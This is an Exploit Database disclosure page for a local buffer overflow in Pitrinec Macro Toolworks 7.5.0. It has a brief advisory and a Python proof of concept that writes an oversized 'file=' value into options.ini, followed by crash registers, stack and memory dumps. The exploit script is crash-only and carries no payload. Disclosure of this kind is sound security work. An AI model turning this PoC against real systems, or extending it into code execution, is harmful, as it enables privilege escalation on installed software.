Macro Toolworks 7.5 – Local Buffer Overflow

• Exploit Database
• 15 阅读

• 作者： Julien Ahrens
  日期： 2012-03-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36928/

• source: https://www.securityfocus.com/bid/52351/info
  
  Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
  
  Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.
  
  Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected. 
  
  #!/usr/bin/python
   
  # Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
  # Version: 7.5.0
  # Date:2012-03-04
  # Author:Julien Ahrens
  # Homepage:http://www.inshell.net
  # Software Link: http://www.macrotoolworks.com
  # Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
  # Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way.
  # Howto: Copy options.ini to App-Dir --> Launch
  
  # 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242 
  (exc.code c0000005, tid 3128)
  
  # Registers:
  # EAX 0120EA00 Stack[000004C8]:0120EA00
  # EBX FFFFFFFF 
  # ECX 42424242 
  # EDX 00000002 
  # ESI 007F6348 _prog.exe:007F6348
  # EDI 007F6348 _prog.exe:007F6348
  # EBP 0120EA0C Stack[000004C8]:0120EA0C
  # ESP 0120E9E8 Stack[000004C8]:0120E9E8
  # EIP 00646D36 _prog.exe:00646D36
  # EFL 00200206
  
  # Stack:
  # 0120E9E00012DF3C
  # 0120E9E400000000
  # 0120E9E80205A5A0debug045:0205A5A0
  # 0120E9EC1B879EF8
  # 0120E9F0007F6348_prog.exe:007F6348
  # 0120E9F4007F6348_prog.exe:007F6348
  
  # Crash:
  # _prog.exe:00646D36 ; ---------------------------------------------------------------------------
  # _prog.exe:00646D36 mov eax, [ecx]
  # _prog.exe:00646D38 calldword ptr [eax+0Ch]
  # _prog.exe:00646D3B callnear ptr unk_6750D0
  # _prog.exe:00646D40 retn4
  # _prog.exe:00646D40 ; ---------------------------------------------------------------------------
  
  # Dump:
  # 007F638041 41 41 41 41 41 41 4141 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  # 007F639041 41 41 41 41 41 41 4141 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
  # 007F63A042 42 42 42 43 43 43 4343 43 43 43 43 43 43 43BBBBCCCCCCCCCCCC
  # 007F63B043 43 43 43 43 43 43 4343 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  # 007F63C043 43 43 43 43 43 43 4343 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  
  file="options.ini"
  
  junk1="\x41" * 744
  boom="\x42\x42\x42\x42"
  junk2="\x43" * 100
  
  poc="[last]\n"
  poc=poc + "file=" + junk1 + boom + junk2 
  
  try:
  print "[*] Creating exploit file...\n"
  writeFile = open (file, "w")
  writeFile.write( poc )
  writeFile.close()
  print "[*] File successfully created!"
  except:
  print "[!] Error while creating file!"